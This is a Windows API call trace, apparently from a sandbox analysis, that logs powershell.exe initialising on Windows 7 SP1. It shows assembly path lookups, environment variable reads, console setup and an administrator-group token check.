	[0369.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0369.946] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0369.953] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0370.286] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x24d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0370.286] SetErrorMode (uMode=0x1) returned 0x1
	[0370.286] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x24d720 | out: lpFileInformation=0x24d720*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0370.286] SetErrorMode (uMode=0x1) returned 0x1
	[0371.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.676] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.678] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0371.678] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.679] CoTaskMemFree (pv=0x1b770e10) 
	[0371.681] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0371.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.682] CoTaskMemFree (pv=0x1b770e10) 
	[0371.682] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0371.682] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.682] CoTaskMemFree (pv=0x1b770e10) 
	[0371.685] CoCreateGuid (in: pguid=0x24dae8 | out: pguid=0x24dae8*(Data1=0xf08fe066, Data2=0x5951, Data3=0x4c65, Data4=([0]=0x92, [1]=0x87, [2]=0x44, [3]=0x9b, [4]=0xbc, [5]=0x29, [6]=0xd, [7]=0x8a))) returned 0x0
	[0371.688] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0371.688] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.688] CoTaskMemFree (pv=0x1b770e10) 
	[0371.691] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0371.691] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.691] CoTaskMemFree (pv=0x1b770e10) 
	[0371.693] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0371.693] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0371.694] CoTaskMemFree (pv=0x1b770e10) 
	[0371.700] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0371.701] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x24d790 | out: lpConsoleScreenBufferInfo=0x24d790) returned 1
	[0371.707] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0371.923] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x24d790 | out: lpConsoleScreenBufferInfo=0x24d790) returned 1
	[0371.924] GetVersionExW (in: lpVersionInformation=0x24d720*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x24d720*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0371.927] GetCurrentProcess () returned 0xffffffffffffffff
	[0371.927] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x24d7b8 | out: TokenHandle=0x24d7b8*=0x320) returned 1
	[0371.931] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d6d8 | out: TokenInformation=0x0, ReturnLength=0x24d6d8) returned 0
	[0371.932] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xc7260
	[0371.932] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xc7260, TokenInformationLength=0x4, ReturnLength=0x24d6d8 | out: TokenInformation=0xc7260, ReturnLength=0x24d6d8) returned 1
	[0371.933] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x24d838 | out: phNewToken=0x24d838*=0x31c) returned 1
	[0371.933] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x24d6d8 | out: TokenInformation=0x0, ReturnLength=0x24d6d8) returned 0
	[0371.933] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0xc7290
	[0371.933] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0xc7290, TokenInformationLength=0x4, ReturnLength=0x24d6d8 | out: TokenInformation=0xc7290, ReturnLength=0x24d6d8) returned 1
	[0371.934] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2c2c6d8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x24d848 | out: IsMember=0x24d848) returned 1
	[0371.934] CloseHandle (hObject=0x31c) returned 1
	[0371.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0371.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d2a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.181] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.185] CoTaskMemAlloc (cb=0x804) returned 0x1b772de0
	[0372.185] GetConsoleTitleW (in: lpConsoleTitle=0x1b772de0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0372.185] CoTaskMemFree (pv=0x1b772de0) 
	[0372.210] CoTaskMemAlloc (cb=0x804) returned 0x1b773690
	[0372.210] GetConsoleTitleW (in: lpConsoleTitle=0x1b773690, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0372.365] CoTaskMemFree (pv=0x1b773690) 
	[0372.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d1d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.367] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0372.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.369] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.536] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.537] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.542] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x24d2b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0372.746] SetConsoleCtrlHandler (HandlerRoutine=0x2a868dc, Add=1) returned 1
	[0372.765] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0373.017] CoCreateGuid (in: pguid=0x24d930 | out: pguid=0x24d930*(Data1=0xce5ac5a3, Data2=0x3c3f, Data3=0x427c, Data4=([0]=0xb4, [1]=0xa, [2]=0xb4, [3]=0x2, [4]=0x7d, [5]=0x31, [6]=0xcf, [7]=0xbc))) returned 0x0
	[0373.018] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.018] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.018] CoTaskMemFree (pv=0x1b770e10) 
	[0373.042] WinSqmIsOptedIn () returned 0x0
	[0373.043] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.043] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.043] CoTaskMemFree (pv=0x1b770e10) 
	[0373.044] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.044] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.044] CoTaskMemFree (pv=0x1b770e10) 
	[0373.045] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.045] CoTaskMemFree (pv=0x1b770e10) 
	[0373.045] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.045] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.045] CoTaskMemFree (pv=0x1b770e10) 
	[0373.046] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.046] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.046] CoTaskMemFree (pv=0x1b770e10) 
	[0373.047] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.047] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.047] CoTaskMemFree (pv=0x1b770e10) 
	[0373.527] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.527] CoTaskMemFree (pv=0x1b770e10) 
	[0373.528] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.528] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.528] CoTaskMemFree (pv=0x1b770e10) 
	[0373.531] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.531] CoTaskMemFree (pv=0x1b770e10) 
	[0373.539] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.539] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.539] CoTaskMemFree (pv=0x1b770e10) 
	[0373.542] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.542] CoTaskMemFree (pv=0x1b770e10) 
	[0373.543] CoTaskMemAlloc (cb=0x104) returned 0x1b770e10
	[0373.543] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b770e10, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0373.543] CoTaskMemFree (pv=0x1b770e10) 
	[0374.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0374.678] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0375.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
